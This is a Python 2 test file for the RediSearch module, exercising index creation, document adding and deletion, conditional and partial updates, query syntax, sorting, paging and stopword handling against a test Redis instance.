source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
test.py | # -*- coding: utf-8 -*-
import redis
import unittest
from hotels import hotels
import random
import time
def testAdd(env):
if env.is_cluster():
raise unittest.SkipTest()
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text', 'body', 'text'))
env.assertTrue(r.exists('idx:idx'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1.0, 'fields',
'title', 'hello world',
'body', 'lorem ist ipsum'))
for _ in r.retry_with_rdb_reload():
prefix = 'ft'
env.assertExists(prefix + ':idx/hello')
env.assertExists(prefix + ':idx/world')
env.assertExists(prefix + ':idx/lorem')
def testConditionalUpdate(env):
env.assertOk(env.cmd(
'ft.create', 'idx', 'schema', 'foo', 'text', 'bar', 'numeric', 'sortable'))
env.assertOk(env.cmd('ft.add', 'idx', '1', '1',
'fields', 'foo', 'hello', 'bar', '123'))
env.assertOk(env.cmd('ft.add', 'idx', '1', '1', 'replace', 'if',
'@foo == "hello"', 'fields', 'foo', 'world', 'bar', '123'))
env.assertEqual('NOADD', env.cmd('ft.add', 'idx', '1', '1', 'replace',
'if', '@foo == "hello"', 'fields', 'foo', 'world', 'bar', '123'))
env.assertEqual('NOADD', env.cmd('ft.add', 'idx', '1', '1', 'replace',
'if', '1 == 2', 'fields', 'foo', 'world', 'bar', '123'))
env.assertOk(env.cmd('ft.add', 'idx', '1', '1', 'replace', 'partial', 'if',
'@foo == "world"', 'fields', 'bar', '234'))
env.assertOk(env.cmd('ft.add', 'idx', '1', '1', 'replace', 'if',
'@bar == 234', 'fields', 'foo', 'hello', 'bar', '123'))
# Ensure that conditionals are ignored if the document doesn't exist
env.assertOk(env.cmd('FT.ADD', 'idx', '666', '1',
'IF', '@bar > 42', 'FIELDS', 'bar', '15'))
# Ensure that it fails if we try again, because it already exists
env.assertEqual('NOADD', env.cmd('FT.ADD', 'idx', '666', '1',
'REPLACE', 'IF', '@bar > 42', 'FIELDS', 'bar', '15'))
# Ensure that it fails because we're not using 'REPLACE'
with env.assertResponseError():
env.assertOk(env.cmd('FT.ADD', 'idx', '666', '1',
'IF', '@bar > 42', 'FIELDS', 'bar', '15'))
def testUnionIdList(env):
# Regression test for https://github.com/RediSearch/RediSearch/issues/306
r = env
N = 100
env.assertOk(r.execute_command(
"ft.create", "test", "SCHEMA", "tags", "TAG", "waypoint", "GEO"))
env.assertOk(r.execute_command(
"ft.add", "test", "1", "1", "FIELDS", "tags", "alberta", "waypoint", "-113.524,53.5244"))
env.assertOk(r.execute_command(
"ft.add", "test", "2", "1", "FIELDS", "tags", "ontario", "waypoint", "-79.395,43.661667"))
print r.cmd('ft.search', 'test', '@tags:{ontario}')
res = r.execute_command(
'ft.search', 'test', "@waypoint:[-113.52 53.52 20 mi]|@tags:{ontario}", 'nocontent')
env.assertEqual(res, [2, '2', '1'])
def testAttributes(env):
env.assertOk(env.cmd('ft.create', 'idx', 'schema',
'title', 'text', 'body', 'text'))
env.assertOk(env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields',
'title', 't1 t2', 'body', 't3 t4 t5'))
env.assertOk(env.cmd('ft.add', 'idx', 'doc2', 1.0, 'fields',
'body', 't1 t2', 'title', 't3 t5'))
res = env.cmd(
'ft.search', 'idx', '(@title:(t1 t2) => {$weight: 0.2}) |(@body:(t1 t2) => {$weight: 0.5})', 'nocontent')
env.assertListEqual([2L, 'doc2', 'doc1'], res)
res = env.cmd(
'ft.search', 'idx', '(@title:(t1 t2) => {$weight: 2.5}) |(@body:(t1 t2) => {$weight: 0.5})', 'nocontent')
env.assertListEqual([2L, 'doc1', 'doc2'], res)
res = env.cmd(
'ft.search', 'idx', '(t3 t5) => {$slop: 4}', 'nocontent')
env.assertListEqual([2L, 'doc2', 'doc1'], res)
res = env.cmd(
'ft.search', 'idx', '(t5 t3) => {$slop: 0}', 'nocontent')
env.assertListEqual([1L, 'doc2'], res)
res = env.cmd(
'ft.search', 'idx', '(t5 t3) => {$slop: 0; $inorder:true}', 'nocontent')
env.assertListEqual([0], res)
def testUnion(env):
N = 100
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'f', 'text'))
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world' if i % 2 == 0 else 'hallo werld'))
for _ in r.retry_with_rdb_reload():
res = r.execute_command(
'ft.search', 'idx', 'hello|hallo', 'nocontent', 'limit', '0', '100')
env.assertEqual(N + 1, len(res))
env.assertEqual(N, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello|world', 'nocontent', 'limit', '0', '100')
env.assertEqual(51, len(res))
env.assertEqual(50, res[0])
res = r.execute_command('ft.search', 'idx', '(hello|hello)(world|world)',
'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(51, len(res))
env.assertEqual(50, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hello|hallo)(werld|world)', 'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(101, len(res))
env.assertEqual(100, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hallo|hello)(world|werld)', 'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(101, len(res))
env.assertEqual(100, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hello|werld)(hallo|world)', 'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(101, len(res))
env.assertEqual(100, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hello|hallo) world', 'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(51, len(res))
env.assertEqual(50, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hello world)|((hello world)|(hallo world|werld) | hello world werld)', 'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(101, len(res))
env.assertEqual(100, res[0])
def testSearch(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text', 'weight', 10.0, 'body', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
'title', 'hello world',
'body', 'lorem ist ipsum'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
'title', 'hello another world',
'body', 'lorem ist ipsum lorem lorem'))
for _ in r.retry_with_rdb_reload():
res = r.execute_command('ft.search', 'idx', 'hello')
env.assertTrue(len(res) == 5)
env.assertEqual(res[0], 2L)
env.assertEqual(res[1], "doc2")
env.assertTrue(isinstance(res[2], list))
env.assertTrue('title' in res[2])
env.assertTrue('hello another world' in res[2])
env.assertEqual(res[3], "doc1")
env.assertTrue('hello world' in res[4])
# Test empty query
res = r.execute_command('ft.search', 'idx', '')
env.assertListEqual([0], res)
# Test searching with no content
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent')
env.assertTrue(len(res) == 3)
env.assertEqual(res[0], 2L)
env.assertEqual(res[1], "doc2")
env.assertEqual(res[2], "doc1")
# Test searching WITHSCORES
res = r.execute_command(
'ft.search', 'idx', 'hello', 'WITHSCORES')
env.assertEqual(len(res), 7)
env.assertEqual(res[0], 2L)
env.assertEqual(res[1], "doc2")
env.assertTrue(float(res[2]) > 0)
env.assertEqual(res[4], "doc1")
env.assertTrue(float(res[5]) > 0)
# Test searching WITHSCORES NOCONTENT
res = r.execute_command(
'ft.search', 'idx', 'hello', 'WITHSCORES', 'NOCONTENT')
env.assertEqual(len(res), 5)
env.assertEqual(res[0], 2L)
env.assertEqual(res[1], "doc2")
env.assertTrue(float(res[2]) > 0)
env.assertEqual(res[3], "doc1")
env.assertTrue(float(res[4]) > 0)
def testSearchNosave(env):
# Check to see what happens when we try to return unsaved documents
env.cmd('ft.create', 'idx', 'SCHEMA', 'f1', 'text')
# Add 3 documents
for x in range(3):
env.cmd('ft.add', 'idx', 'doc{}'.format(x),
1.0, 'NOSAVE', 'FIELDS', 'f1', 'value')
# Now query the results
res = env.cmd('ft.search', 'idx', 'value')
env.assertEqual(3, res[0])
for content in res[2::2]:
env.assertEqual([], content)
def testGet(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text', 'bar', 'text'))
for i in range(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'hello world', 'bar', 'wat wat'))
for i in range(100):
res = r.execute_command('ft.get', 'idx', 'doc%d' % i)
env.assertIsNotNone(res)
env.assertListEqual(
['foo', 'hello world', 'bar', 'wat wat'], res)
env.assertIsNone(r.execute_command(
'ft.get', 'idx', 'doc%dsdfsd' % i))
rr = r.execute_command(
'ft.mget', 'idx', *('doc%d' % i for i in range(100)))
env.assertEqual(len(rr), 100)
for res in rr:
env.assertIsNotNone(res)
env.assertListEqual(
['foo', 'hello world', 'bar', 'wat wat'], res)
rr = r.execute_command(
'ft.mget', 'idx', *('doc-%d' % i for i in range(100)))
env.assertEqual(len(rr), 100)
for res in rr:
env.assertIsNone(res)
# Verify that when a document is deleted, GET returns NULL
r.cmd('ft.del', 'idx', 'doc10') # But we still keep the document
r.cmd('ft.del', 'idx', 'doc11')
res = r.cmd('ft.get', 'idx', 'doc10')
r.assertEqual(None, res)
res = r.cmd('ft.mget', 'idx', 'doc10', 'doc11', 'doc12')
r.assertIsNone(res[0])
r.assertIsNone(res[1])
r.assertTrue(not not res[2])
def testDelete(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'f', 'text'))
for i in range(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world'))
for i in range(100):
# the doc hash should exist now
r.expect('ft.get', 'idx', 'doc%d' % i).notRaiseError()
# Delete the actual docs only half of the time
env.assertEqual(1, r.execute_command(
'ft.del', 'idx', 'doc%d' % i, 'DD' if i % 2 == 0 else ''))
# second delete should return 0
env.assertEqual(0, r.execute_command(
'ft.del', 'idx', 'doc%d' % i))
# After del with DD the doc hash should not exist
if i % 2 == 0:
env.assertFalse(r.exists('doc%d' % i))
else:
r.expect('ft.get', 'idx', 'doc%d' % i).notRaiseError()
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', 0, 100)
env.assertNotIn('doc%d' % i, res)
env.assertEqual(res[0], 100 - i - 1)
env.assertEqual(len(res), 100 - i)
# test reinsertion
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world'))
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', 0, 100)
env.assertIn('doc%d' % i, res)
env.assertEqual(1, r.execute_command(
'ft.del', 'idx', 'doc%d' % i))
for _ in r.retry_with_rdb_reload():
did = 'rrrr'
env.assertOk(r.execute_command('ft.add', 'idx', did, 1, 'fields',
'f', 'hello world'))
env.assertEqual(1, r.execute_command('ft.del', 'idx', did))
env.assertEqual(0, r.execute_command('ft.del', 'idx', did))
env.assertOk(r.execute_command('ft.add', 'idx', did, 1, 'fields',
'f', 'hello world'))
env.assertEqual(1, r.execute_command('ft.del', 'idx', did))
env.assertEqual(0, r.execute_command('ft.del', 'idx', did))
def testReplace(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'f', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1.0, 'fields',
'f', 'hello world'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
'f', 'hello world'))
res = r.execute_command(
'ft.search', 'idx', 'hello world')
env.assertEqual(2, res[0])
with env.assertResponseError():
# make sure we can't insert a doc twice
res = r.execute_command('ft.add', 'idx', 'doc1', 1.0, 'fields',
'f', 'hello world')
# now replace doc1 with a different content
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1.0, 'replace', 'fields',
'f', 'goodbye universe'))
for _ in r.retry_with_rdb_reload():
# make sure the query for hello world does not return the replaced
# document
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent')
env.assertEqual(1, res[0])
env.assertEqual('doc2', res[1])
# search for the doc's new content
res = r.execute_command(
'ft.search', 'idx', 'goodbye universe', 'nocontent')
env.assertEqual(1, res[0])
env.assertEqual('doc1', res[1])
def testDrop(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'f', 'text', 'n', 'numeric', 't', 'tag', 'g', 'geo'))
for i in range(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world', 'n', 666, 't', 'foo bar',
'g', '19.04,47.497'))
keys = r.keys('*')
env.assertGreaterEqual(len(keys), 100)
env.assertOk(r.execute_command('ft.drop', 'idx'))
keys = r.keys('*')
env.assertEqual(0, len(keys))
# Now do the same with KEEPDOCS
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'f', 'text', 'n', 'numeric', 't', 'tag', 'g', 'geo'))
for i in range(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world', 'n', 666, 't', 'foo bar',
'g', '19.04,47.497'))
keys = r.keys('*')
env.assertGreaterEqual(len(keys), 100)
if not env.is_cluster():
env.assertOk(r.execute_command('ft.drop', 'idx', 'KEEPDOCS'))
keys = r.keys('*')
env.assertListEqual(['doc0', 'doc1', 'doc10', 'doc11', 'doc12', 'doc13', 'doc14', 'doc15', 'doc16', 'doc17', 'doc18', 'doc19', 'doc2', 'doc20', 'doc21', 'doc22', 'doc23', 'doc24', 'doc25', 'doc26', 'doc27', 'doc28', 'doc29', 'doc3', 'doc30', 'doc31', 'doc32', 'doc33', 'doc34', 'doc35', 'doc36', 'doc37', 'doc38', 'doc39', 'doc4', 'doc40', 'doc41', 'doc42', 'doc43', 'doc44', 'doc45', 'doc46', 'doc47', 'doc48', 'doc49', 'doc5', 'doc50', 'doc51', 'doc52', 'doc53',
'doc54', 'doc55', 'doc56', 'doc57', 'doc58', 'doc59', 'doc6', 'doc60', 'doc61', 'doc62', 'doc63', 'doc64', 'doc65', 'doc66', 'doc67', 'doc68', 'doc69', 'doc7', 'doc70', 'doc71', 'doc72', 'doc73', 'doc74', 'doc75', 'doc76', 'doc77', 'doc78', 'doc79', 'doc8', 'doc80', 'doc81', 'doc82', 'doc83', 'doc84', 'doc85', 'doc86', 'doc87', 'doc88', 'doc89', 'doc9', 'doc90', 'doc91', 'doc92', 'doc93', 'doc94', 'doc95', 'doc96', 'doc97', 'doc98', 'doc99'], sorted(keys))
def testCustomStopwords(env):
r = env
# Index with default stopwords
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text'))
# Index with custom stopwords
env.assertOk(r.execute_command('ft.create', 'idx2', 'stopwords', 2, 'hello', 'world',
'schema', 'foo', 'text'))
# Index with NO stopwords
env.assertOk(r.execute_command('ft.create', 'idx3', 'stopwords', 0,
'schema', 'foo', 'text'))
for idx in ('idx', 'idx2', 'idx3'):
env.assertOk(r.execute_command(
'ft.add', idx, 'doc1', 1.0, 'fields', 'foo', 'hello world'))
env.assertOk(r.execute_command(
'ft.add', idx, 'doc2', 1.0, 'fields', 'foo', 'to be or not to be'))
for _ in r.retry_with_rdb_reload():
# Normal index should return results just for 'hello world'
env.assertEqual([1, 'doc1'], r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent'))
env.assertEqual([0], r.execute_command(
'ft.search', 'idx', 'to be or not', 'nocontent'))
# Custom SW index should return results just for 'to be or not'
env.assertEqual([0], r.execute_command(
'ft.search', 'idx2', 'hello world', 'nocontent'))
env.assertEqual([1, 'doc2'], r.execute_command(
'ft.search', 'idx2', 'to be or not', 'nocontent'))
# No SW index should return results for both
env.assertEqual([1, 'doc1'], r.execute_command(
'ft.search', 'idx3', 'hello world', 'nocontent'))
env.assertEqual([1, 'doc2'], r.execute_command(
'ft.search', 'idx3', 'to be or not', 'nocontent'))
def testStopwords(env):
# This test was taken from Python's tests, and failed due to some changes
# made earlier
env.cmd('ft.create', 'idx', 'stopwords', 3, 'foo',
'bar', 'baz', 'schema', 'txt', 'text')
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields', 'txt', 'foo bar')
env.cmd('ft.add', 'idx', 'doc2', 1.0, 'fields', 'txt', 'hello world')
r1 = env.cmd('ft.search', 'idx', 'foo bar', 'nocontent')
r2 = env.cmd('ft.search', 'idx', 'foo bar hello world', 'nocontent')
env.assertEqual(0, r1[0])
env.assertEqual(1, r2[0])
def testNoStopwords(env):
# This test taken from Java's test suite
env.cmd('ft.create', 'idx', 'schema', 'title', 'text')
for i in range(100):
env.cmd('ft.add', 'idx', 'doc{}'.format(i), 1.0, 'fields',
'title', 'hello world' if i % 2 == 0 else 'hello worlds')
res = env.cmd('ft.search', 'idx', 'hello a world', 'NOCONTENT')
env.assertEqual(100, res[0])
res = env.cmd('ft.search', 'idx', 'hello a world',
'VERBATIM', 'NOCONTENT')
env.assertEqual(50, res[0])
res = env.cmd('ft.search', 'idx', 'hello a world', 'NOSTOPWORDS')
env.assertEqual(0, res[0])
def testOptional(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx',
'doc1', 1.0, 'fields', 'foo', 'hello wat woot'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2',
1.0, 'fields', 'foo', 'hello world woot'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc3',
1.0, 'fields', 'foo', 'hello world werld'))
res = r.execute_command('ft.search', 'idx', 'hello', 'nocontent')
env.assertEqual([3L, 'doc3', 'doc2', 'doc1'], res)
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent', 'scorer', 'DISMAX')
env.assertEqual([2L, 'doc3', 'doc2'], res)
res = r.execute_command(
'ft.search', 'idx', 'hello ~world', 'nocontent', 'scorer', 'DISMAX')
env.assertEqual([3L, 'doc3', 'doc2', 'doc1'], res)
res = r.execute_command(
'ft.search', 'idx', 'hello ~world ~werld', 'nocontent', 'scorer', 'DISMAX')
env.assertEqual([3L, 'doc3', 'doc2', 'doc1'], res)
res = r.execute_command(
'ft.search', 'idx', '~world ~werld hello', 'nocontent', 'scorer', 'DISMAX')
env.assertEqual([3L, 'doc3', 'doc2', 'doc1'], res)
def testExplain(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text', 'bar', 'numeric', 'sortable'))
q = '(hello world) "what what" hello|world @bar:[10 100]|@bar:[200 300]'
res = r.execute_command('ft.explain', 'idx', q)
# print res.replace('\n', '\\n')
# expected = """INTERSECT {\n UNION {\n hello\n +hello(expanded)\n }\n UNION {\n world\n +world(expanded)\n }\n EXACT {\n what\n what\n }\n UNION {\n UNION {\n hello\n +hello(expanded)\n }\n UNION {\n world\n +world(expanded)\n }\n }\n UNION {\n NUMERIC {10.000000 <= @bar <= 100.000000}\n NUMERIC {200.000000 <= @bar <= 300.000000}\n }\n}\n"""
# expected = """INTERSECT {\n UNION {\n hello\n <HL(expanded)\n +hello(expanded)\n }\n UNION {\n world\n <ARLT(expanded)\n +world(expanded)\n }\n EXACT {\n what\n what\n }\n UNION {\n UNION {\n hello\n <HL(expanded)\n +hello(expanded)\n }\n UNION {\n world\n <ARLT(expanded)\n +world(expanded)\n }\n }\n UNION {\n NUMERIC {10.000000 <= @bar <= 100.000000}\n NUMERIC {200.000000 <= @bar <= 300.000000}\n }\n}\n"""
expected = """INTERSECT {\n UNION {\n hello\n +hello(expanded)\n }\n UNION {\n world\n +world(expanded)\n }\n EXACT {\n what\n what\n }\n UNION {\n UNION {\n hello\n +hello(expanded)\n }\n UNION {\n world\n +world(expanded)\n }\n }\n UNION {\n NUMERIC {10.000000 <= @bar <= 100.000000}\n NUMERIC {200.000000 <= @bar <= 300.000000}\n }\n}\n"""
env.assertEqual(res, expected)
# expected = ['INTERSECT {', ' UNION {', ' hello', ' <HL(expanded)', ' +hello(expanded)', ' }', ' UNION {', ' world', ' <ARLT(expanded)', ' +world(expanded)', ' }', ' EXACT {', ' what', ' what', ' }', ' UNION {', ' UNION {', ' hello', ' <HL(expanded)', ' +hello(expanded)', ' }', ' UNION {', ' world', ' <ARLT(expanded)', ' +world(expanded)', ' }', ' }', ' UNION {', ' NUMERIC {10.000000 <= @bar <= 100.000000}', ' NUMERIC {200.000000 <= @bar <= 300.000000}', ' }', '}', '']
if env.is_cluster():
raise unittest.SkipTest()
res = env.cmd('ft.explainCli', 'idx', q)
expected = ['INTERSECT {', ' UNION {', ' hello', ' +hello(expanded)', ' }', ' UNION {', ' world', ' +world(expanded)', ' }', ' EXACT {', ' what', ' what', ' }', ' UNION {', ' UNION {', ' hello', ' +hello(expanded)', ' }', ' UNION {', ' world', ' +world(expanded)', ' }', ' }', ' UNION {', ' NUMERIC {10.000000 <= @bar <= 100.000000}', ' NUMERIC {200.000000 <= @bar <= 300.000000}', ' }', '}', '']
env.assertEqual(expected, res)
def testNoIndex(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema',
'foo', 'text',
'num', 'numeric', 'sortable', 'noindex',
'extra', 'text', 'noindex', 'sortable'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '0.1', 'fields',
'foo', 'hello world', 'num', 1, 'extra', 'hello lorem ipsum'))
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent')
env.assertListEqual([1, 'doc1'], res)
res = r.execute_command(
'ft.search', 'idx', 'lorem ipsum', 'nocontent')
env.assertListEqual([0], res)
res = r.execute_command(
'ft.search', 'idx', '@extra:hello', 'nocontent')
env.assertListEqual([0], res)
res = r.execute_command(
'ft.search', 'idx', '@num:[1 1]', 'nocontent')
env.assertListEqual([0], res)
def testPartial(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema',
'foo', 'text',
'num', 'numeric', 'sortable', 'noindex',
'extra', 'text', 'noindex'))
# print r.execute_command('ft.info', 'idx')
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '0.1', 'fields',
'foo', 'hello world', 'num', 1, 'extra', 'lorem ipsum'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', '0.1', 'fields',
'foo', 'hello world', 'num', 2, 'extra', 'abba'))
res = r.execute_command('ft.search', 'idx', 'hello world',
'sortby', 'num', 'asc', 'nocontent', 'withsortkeys')
env.assertListEqual([2L, 'doc1', '#1', 'doc2', '#2'], res)
res = r.execute_command('ft.search', 'idx', 'hello world',
'sortby', 'num', 'desc', 'nocontent', 'withsortkeys')
env.assertListEqual([2L, 'doc2', '#2', 'doc1', '#1'], res)
# Updating non indexed fields doesn't affect search results
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '0.1', 'replace', 'partial',
'fields', 'num', 3, 'extra', 'jorem gipsum'))
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'sortby', 'num', 'desc',)
assertResultsEqual(env, [2L, 'doc1', ['foo', 'hello world', 'num', '3', 'extra', 'jorem gipsum'],
'doc2', ['foo', 'hello world', 'num', '2', 'extra', 'abba']], res)
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'withscores')
# Updating only indexed field affects search results
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '0.1', 'replace', 'partial',
'fields', 'foo', 'wat wet'))
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent')
env.assertListEqual([1L, 'doc2'], res)
res = r.execute_command('ft.search', 'idx', 'wat', 'nocontent')
env.assertListEqual([1L, 'doc1'], res)
# Test updating of score and no fields
res = r.execute_command(
'ft.search', 'idx', 'wat', 'nocontent', 'withscores')
env.assertLess(float(res[2]), 1)
# env.assertListEqual([1L, 'doc1'], res)
env.assertOk(r.execute_command('ft.add', 'idx',
'doc1', '1.0', 'replace', 'partial', 'fields'))
res = r.execute_command(
'ft.search', 'idx', 'wat', 'nocontent', 'withscores')
env.assertGreater(float(res[2]), 1)
# Test updating payloads
res = r.execute_command(
'ft.search', 'idx', 'wat', 'nocontent', 'withpayloads')
env.assertIsNone(res[2])
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '1.0',
'replace', 'partial', 'payload', 'foobar', 'fields'))
res = r.execute_command(
'ft.search', 'idx', 'wat', 'nocontent', 'withpayloads')
env.assertEqual('foobar', res[2])
def testPaging(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text', 'bar', 'numeric', 'sortable'))
N = 100
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', '%d' % i, 1, 'fields',
'foo', 'hello', 'bar', i))
chunk = 7
offset = 0
while True:
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'sortby', 'bar', 'desc', 'limit', offset, chunk)
env.assertEqual(res[0], N)
if offset + chunk > N:
env.assertTrue(len(res) - 1 <= chunk)
break
env.assertEqual(len(res), chunk + 1)
for n, id in enumerate(res[1:]):
env.assertEqual(int(id), N - 1 - (offset + n))
offset += chunk
chunk = random.randrange(1, 10)
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'sortby', 'bar', 'asc', 'limit', N, 10)
env.assertEqual(res[0], N)
env.assertEqual(len(res), 1)
with env.assertResponseError():
r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', 0, -1)
with env.assertResponseError():
r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', -1, 10)
with env.assertResponseError():
r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', 0, 2000000)
def testPrefix(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text'))
N = 100
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'constant term%d' % (random.randrange(0, 5))))
for _ in r.retry_with_rdb_reload():
res = r.execute_command(
'ft.search', 'idx', 'constant term', 'nocontent')
env.assertEqual([0], res)
res = r.execute_command(
'ft.search', 'idx', 'constant term*', 'nocontent')
env.assertEqual(N, res[0])
res = r.execute_command(
'ft.search', 'idx', 'const* term*', 'nocontent')
env.assertEqual(N, res[0])
res = r.execute_command(
'ft.search', 'idx', 'constant term1*', 'nocontent')
env.assertGreater(res[0], 2)
res = r.execute_command(
'ft.search', 'idx', 'const* -term*', 'nocontent')
env.assertEqual([0], res)
res = r.execute_command(
'ft.search', 'idx', 'constant term9*', 'nocontent')
env.assertEqual([0], res)
def testSortBy(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text', 'sortable', 'bar', 'numeric', 'sortable'))
N = 100
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'hello%03d world' % i, 'bar', 100 - i))
for _ in r.retry_with_rdb_reload():
res = r.execute_command(
'ft.search', 'idx', 'world', 'nocontent', 'sortby', 'foo')
env.assertEqual([100L, 'doc0', 'doc1', 'doc2', 'doc3',
'doc4', 'doc5', 'doc6', 'doc7', 'doc8', 'doc9'], res)
res = r.execute_command(
'ft.search', 'idx', 'world', 'nocontent', 'sortby', 'foo', 'desc')
env.assertEqual([100L, 'doc99', 'doc98', 'doc97', 'doc96',
'doc95', 'doc94', 'doc93', 'doc92', 'doc91', 'doc90'], res)
res = r.execute_command(
'ft.search', 'idx', 'world', 'nocontent', 'sortby', 'bar', 'desc')
env.assertEqual([100L, 'doc0', 'doc1', 'doc2', 'doc3',
'doc4', 'doc5', 'doc6', 'doc7', 'doc8', 'doc9'], res)
res = r.execute_command(
'ft.search', 'idx', 'world', 'nocontent', 'sortby', 'bar', 'asc')
env.assertEqual([100L, 'doc99', 'doc98', 'doc97', 'doc96',
'doc95', 'doc94', 'doc93', 'doc92', 'doc91', 'doc90'], res)
res = r.execute_command('ft.search', 'idx', 'world', 'nocontent',
'sortby', 'bar', 'desc', 'withscores', 'limit', '2', '5')
env.assertEqual(
[100L, 'doc2', '0', 'doc3', '0', 'doc4', '0', 'doc5', '0', 'doc6', '0'], res)
res = r.execute_command('ft.search', 'idx', 'world', 'nocontent',
'sortby', 'bar', 'desc', 'withsortkeys', 'limit', 0, 5)
env.assertListEqual(
[100L, 'doc0', '#100', 'doc1', '#99', 'doc2', '#98', 'doc3', '#97', 'doc4', '#96'], res)
res = r.execute_command('ft.search', 'idx', 'world', 'nocontent',
'sortby', 'foo', 'desc', 'withsortkeys', 'limit', 0, 5)
env.assertListEqual([100L, 'doc99', '$hello099 world', 'doc98', '$hello098 world', 'doc97', '$hello097 world', 'doc96',
'$hello096 world', 'doc95', '$hello095 world'], res)
def testNot(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text'))
N = 10
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'constant term%d' % (random.randrange(0, 5))))
for i in range(5):
inclusive = r.execute_command(
'ft.search', 'idx', 'constant term%d' % i, 'nocontent', 'limit', 0, N)
exclusive = r.execute_command(
'ft.search', 'idx', 'constant -term%d' % i, 'nocontent', 'limit', 0, N)
exclusive2 = r.execute_command(
'ft.search', 'idx', '-(term%d)' % i, 'nocontent', 'limit', 0, N)
exclusive3 = r.execute_command(
'ft.search', 'idx', '(-term%d) (constant)' % i, 'nocontent', 'limit', 0, N)
env.assertNotEqual(inclusive[0], N)
env.assertEqual(inclusive[0] + exclusive[0], N)
env.assertEqual(exclusive3[0], exclusive2[0])
env.assertEqual(exclusive3[0], exclusive[0])
s1, s2, s3, s4 = set(inclusive[1:]), set(
exclusive[1:]), set(exclusive2[1:]), set(exclusive3[1:])
env.assertTrue(s1.difference(s2) == s1)
env.assertTrue(s1.difference(s3) == s1)
env.assertTrue(s1.difference(s4) == s1)
env.assertTrue(s2 == s3)
env.assertTrue(s2 == s4)
